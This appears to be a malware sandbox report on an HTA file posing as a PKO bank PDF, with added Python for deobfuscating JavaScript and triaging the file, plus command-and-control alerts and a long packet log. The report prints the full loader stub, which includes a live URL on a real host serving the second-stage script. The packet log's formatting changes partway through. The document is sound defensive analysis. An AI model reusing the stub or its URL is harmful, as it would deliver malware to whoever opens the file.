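 for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith,"""

_NUM = r"(?:0[xX][0-9a-fA-F]+|0|[1-9][0-9]*)"
# A run of two or more integer literals joined by + - *.
#  - lookbehind: do not start right after an identifier character, a dot, or an
#    operator that binds tighter or associates left (a - 0x1 + 0x2 is not a - 3);
#  - lookahead: do not stop in front of * / %, which would bind the last literal away.
_SEQ = re.compile(
    rf"(?<![\w.\-*/%~!\s])"
    rf"(\s*)(-?\s*{_NUM}(?:\s*[-+*]\s*-?\s*{_NUM})+)"
    rf"(?!\s*[*/%])"
)
_BINOPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def _eval_int(node: ast.AST) -> int:
    """Evaluate an AST made only of int literals, unary minus and + - * (no eval())."""
    if isinstance(node, ast.Expression):
        return _eval_int(node.body)
    if isinstance(node, ast.Constant) and type(node.value) is int:
        return node.value
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
        return -_eval_int(node.operand)
    if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
        return _BINOPS[type(node.op)](_eval_int(node.left), _eval_int(node.right))
    raise ValueError(f"unsupported node: {ast.dump(node)}")


def fold_constants(js: str) -> str:
    """Replace every foldable run of literal arithmetic with its decimal value."""
    def repl(m: re.Match) -> str:
        value = _eval_int(ast.parse(m.group(2), mode="eval"))
        return m.group(1) + str(value)
    return _SEQ.sub(repl, js)


def folded_constants(js: str) -> list[int]:
    """The folded values in order of appearance: the obfuscator's real constants."""
    return [_eval_int(ast.parse(m.group(2), mode="eval")) for m in _SEQ.finditer(js)]


if __name__ == "__main__":
    print(fold_constants(PREVIEW))
    print("constants:", folded_constants(PREVIEW))
```

On the preview this yields `andrewforces - (331)` (the string-array index offset), `Courtvii = 0` and `wOuldsovereignty = 0` (loop counters), and `% (4)` with `* (64)` next to the alphabet string, which is the accumulator of a hand-rolled base64 decoder. Division is deliberately not folded, because JavaScript division is floating point and the result would need a different representation.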
                                                                                                                            File type:HTML document, ASCII text
                                                                                                                            Entropy (8bit):5.047836866900538
                                                                                                                            TrID:
                                                                                                                            • HyperText Markup Language (12001/1) 66.65%
                                                                                                                            • HyperText Markup Language (6006/1) 33.35%
                                                                                                                            File name:PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta
                                                                                                                            File size:138 bytes
                                                                                                                            MD5:8da85c61d9b033c0c6b99452a4d66976
                                                                                                                            SHA1:bf2e95e2c7d9e3690fcb323daefaba311021cea6
                                                                                                                            SHA256:0f2b38a3af80d5eb72b72f5b5dfe2e57d155608e64ec79f03b4ec58f81a851bc
                                                                                                                            SHA512:2c1a86fea21a2b952d114db9bd4bada11e90d231a026ce203a2f4e43ef733aeabde0d149da49082a95f04a1781550e8b6cbc9bc420eb30d54cfe538e5cd8772b
                                                                                                                            SSDEEP:3:qVvzLDLvBDJlbpLOdcMuKpRcPWRNGXIL0NhtvxL0Hac4NGb:qFzLPvB7bpL+FJNV4Nhdx434Qb
                                                                                                                            TLSH:4EC09BDB6C46D2056554945C545DE6444413635D04E1C5C0D6F4D0FB79109578D471A9
File Content Preview:
<html>
<head>
<script src="https://pko-download.kagyouth.co.ke/676198543e20a/js/676198543e135.js"></script>
</head>
<body>
</body>
</html>
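The 138-byte HTA carries no payload of its own: mshta.exe renders it as HTML and fetches the whole second stage from the remote script URL. That makes the file hashes a weak indicator (any change to the stub gives a new hash) and the URL and host the durable ones. The following Python triage routine is an added example, not part of the report or the sample. It reconstructs the HTA bytes from the preview above (Joe Sandbox renders each line break as "."; six LF line breaks and no trailing newline give the listed size of 138 bytes), extracts every `<script src=>` that points at an http(s) host, hashes the file, and compares the hashes with the ones the report lists, so `matches_report` doubles as a check that the reconstruction is byte-exact.

```python
import hashlib
import re
from typing import Optional
from urllib.parse import urlparse

# The HTA reconstructed from the report's "File Content Preview" (line breaks shown
# there as "."): six LF line breaks, no trailing newline, 138 bytes.
HTA_BYTES = (
    b"<html>\n"
    b"<head>\n"
    b'<script src="https://pko-download.kagyouth.co.ke/676198543e20a/js/676198543e135.js"></script>\n'
    b"</head>\n"
    b"<body>\n"
    b"</body>\n"
    b"</html>"
)

# Hashes the report lists for the original sample; used to validate the reconstruction.
REPORT_HASHES = {
    "md5": "8da85c61d9b033c0c6b99452a4d66976",
    "sha1": "bf2e95e2c7d9e3690fcb323daefaba311021cea6",
    "sha256": "0f2b38a3af80d5eb72b72f5b5dfe2e57d155608e64ec79f03b4ec58f81a851bc",
}

_SCRIPT_SRC = re.compile(rb'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


def remote_script_sources(data: bytes) -> list[str]:
    """Every <script src=...> whose target is an http(s) URL (the remote-loader tell)."""
    urls = []
    for m in _SCRIPT_SRC.finditer(data):
        url = m.group(1).decode("latin-1").strip()
        if urlparse(url).scheme.lower() in ("http", "https"):
            urls.append(url)
    return urls


def file_hashes(data: bytes) -> dict[str, str]:
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def triage_hta(data: bytes, known: Optional[dict[str, str]] = None) -> dict:
    """Static triage of an .hta: size, hashes, remote script URLs and their hosts."""
    urls = remote_script_sources(data)
    hashes = file_hashes(data)
    hosts = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    return {
        "size": len(data),
        "hashes": hashes,
        "remote_script_urls": urls,
        "hosts": hosts,
        "verdict": "remote script loader" if urls else "no remote script include",
        # True only if the bytes are identical to the sample the report hashed.
        "matches_report": bool(known) and all(hashes[k] == v for k, v in known.items()),
    }


if __name__ == "__main__":
    for key, value in triage_hta(HTA_BYTES, REPORT_HASHES).items():
        print(f"{key}: {value}")
```

Run against a real file, read it in binary mode and pass the bytes; the `hosts` list is what goes into a block list or a DNS/proxy hunt, and the `remote_script_urls` list is what to pull (from an isolated host) to obtain the second stage the report saw being dropped.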
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-17T16:30:22.996815+0100 | 2057063 | ET MALWARE Mints.Loader CnC Activity (GET) | 1 | 192.168.2.4 | 49748 | 193.149.129.61 | 80 | TCP
2024-12-17T16:30:22.996815+0100 | 2057743 | ET MALWARE TA582 CnC Checkin | 1 | 192.168.2.4 | 49748 | 193.149.129.61 | 80 | TCP
2024-12-17T16:30:23.043711+0100 | 2057063 | ET MALWARE Mints.Loader CnC Activity (GET) | 1 | 192.168.2.4 | 49749 | 193.149.129.61 | 80 | TCP
2024-12-17T16:30:23.043711+0100 | 2057743 | ET MALWARE TA582 CnC Checkin | 1 | 192.168.2.4 | 49749 | 193.149.129.61 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 16:30:03.822509050 CET | 49730 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:03.822622061 CET | 443 | 49730 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:03.822783947 CET | 49730 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:03.837464094 CET | 49730 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:03.837500095 CET | 443 | 49730 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:05.232812881 CET | 443 | 49730 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:05.233035088 CET | 49730 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:05.289936066 CET | 49730 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:05.290016890 CET | 443 | 49730 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:05.290462971 CET | 443 | 49730 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:05.290539980 CET | 49730 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:05.294985056 CET | 49730 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:05.335331917 CET | 443 | 49730 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:05.755601883 CET | 443 | 49730 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:05.755696058 CET | 443 | 49730 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:05.755716085 CET | 49730 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:05.755764961 CET | 49730 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:05.757499933 CET | 49730 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:05.757528067 CET | 443 | 49730 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:05.776093960 CET | 49731 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:05.776151896 CET | 443 | 49731 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:05.776273966 CET | 49731 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:05.776514053 CET | 49731 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:05.776529074 CET | 443 | 49731 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:07.141202927 CET | 443 | 49731 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:07.141341925 CET | 49731 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:07.141871929 CET | 49731 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:07.141880035 CET | 443 | 49731 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:07.142158985 CET | 49731 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:07.142162085 CET | 443 | 49731 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:07.651420116 CET | 443 | 49731 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:07.651506901 CET | 443 | 49731 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:07.651612043 CET | 49731 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:07.658201933 CET | 49731 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:07.658229113 CET | 443 | 49731 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:08.478698969 CET | 49737 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:08.478760958 CET | 443 | 49737 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:08.478866100 CET | 49737 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:08.487827063 CET | 49737 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:08.487868071 CET | 443 | 49737 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:09.993063927 CET | 443 | 49737 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:09.993253946 CET | 49737 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:09.994678020 CET | 49737 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:09.994697094 CET | 443 | 49737 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:09.994916916 CET | 443 | 49737 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:09.999064922 CET | 49737 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:10.043333054 CET | 443 | 49737 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:10.503185034 CET | 443 | 49737 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:10.503216028 CET | 443 | 49737 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:10.503285885 CET | 443 | 49737 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:10.503295898 CET | 49737 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:10.503456116 CET | 49737 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:10.909082890 CET | 49737 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:10.909113884 CET | 443 | 49737 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:12.283777952 CET | 49739 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:12.283823013 CET | 443 | 49739 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:12.284111977 CET | 49739 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:12.336417913 CET | 49739 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:12.336453915 CET | 443 | 49739 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:12.823901892 CET | 49740 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:12.823945999 CET | 443 | 49740 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:12.824065924 CET | 49740 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:12.895998955 CET | 49740 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:12.896017075 CET | 443 | 49740 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:13.737132072 CET | 443 | 49739 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:13.737222910 CET | 49739 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:13.742162943 CET | 49739 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:13.742196083 CET | 443 | 49739 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:13.742465973 CET | 443 | 49739 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:13.742651939 CET | 49739 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:13.744553089 CET | 49739 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:13.787339926 CET | 443 | 49739 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.247628927 CET | 443 | 49739 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.247653008 CET | 443 | 49739 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.247710943 CET | 443 | 49739 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.247726917 CET | 49739 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.247778893 CET | 49739 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.250150919 CET | 49739 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.250191927 CET | 443 | 49739 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.259439945 CET | 443 | 49740 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.259601116 CET | 49740 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.265554905 CET | 49740 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.265566111 CET | 443 | 49740 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.265824080 CET | 443 | 49740 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.266007900 CET | 49740 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.274614096 CET | 49742 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.274648905 CET | 443 | 49742 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.274755955 CET | 49742 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.276660919 CET | 49740 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.276797056 CET | 49742 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.276808023 CET | 443 | 49742 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.319336891 CET | 443 | 49740 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.865076065 CET | 443 | 49740 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.865108013 CET | 443 | 49740 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.865161896 CET | 49740 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.865170956 CET | 443 | 49740 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.865267992 CET | 49740 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.874006033 CET | 49740 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.874027967 CET | 443 | 49740 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.904912949 CET | 49744 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.904953957 CET | 443 | 49744 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:14.905910015 CET | 49744 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.906141043 CET | 49744 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:14.906152964 CET | 443 | 49744 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:15.663398981 CET | 443 | 49742 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:15.663458109 CET | 49742 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:15.664253950 CET | 49742 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:15.664263964 CET | 443 | 49742 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:15.664587975 CET | 49742 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:15.664592028 CET | 443 | 49742 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:16.173677921 CET | 443 | 49742 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:16.173708916 CET | 443 | 49742 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:16.173770905 CET | 49742 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:16.173785925 CET | 443 | 49742 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:16.173835993 CET | 49742 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:16.268213987 CET | 443 | 49744 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:16.268301010 CET | 49744 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:16.268748045 CET | 49744 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:16.268776894 CET | 443 | 49744 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:16.268984079 CET | 49744 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:16.268997908 CET | 443 | 49744 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:16.293287039 CET | 443 | 49742 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:16.293376923 CET | 49742 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:16.381901026 CET | 443 | 49742 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:16.381983042 CET | 49742 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:16.403585911 CET | 443 | 49742 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:16.403655052 CET | 49742 | 443 | 192.168.2.4 | 45.11.180.77
Dec 17, 2024 16:30:16.425539970 CET | 443 | 49742 | 45.11.180.77 | 192.168.2.4
Dec 17, 2024 16:30:16.425612926 CET | 49742 | 443 | 192.168.2.4 | 45.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.486071110 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.486145020 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.563956022 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.564024925 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.580236912 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.580369949 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.593993902 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.594080925 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.605987072 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.606049061 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.618702888 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.618767977 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.635502100 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.635565042 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.648160934 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.648232937 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.684197903 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.684287071 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.764774084 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.764870882 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.776195049 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.776252031 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.785995960 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.786058903 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.788254976 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.788291931 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.788310051 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.788341045 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.788356066 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.788381100 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.792087078 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.792159081 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.799699068 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.799765110 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.808340073 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.808403015 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.813654900 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.813740015 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.820408106 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.820487976 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.824044943 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.824124098 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.830593109 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.830809116 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.870182037 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.870279074 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.875396967 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.875494003 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.905857086 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.906092882 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.958506107 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.958584070 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.962299109 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.962364912 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.968662024 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.968732119 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.973702908 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.973779917 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.979499102 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.979571104 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.979585886 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.979629040 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.979635954 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.979667902 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.979703903 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.979726076 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.991198063 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.991302013 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.991302013 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.024626970 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.024724007 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.049565077 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.049674034 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.141855955 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.141979933 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.177932978 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.178025961 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.199078083 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.199186087 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.209767103 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.209861994 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.223261118 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.223372936 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.236160040 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.236278057 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.253689051 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.253788948 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.266758919 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.266907930 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.333873987 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.333972931 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.368051052 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.368150949 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.377696991 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.377772093 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.386873960 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.386938095 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.396239042 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.396310091 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.401774883 CET4434974445.11.180.77192.168.2.4
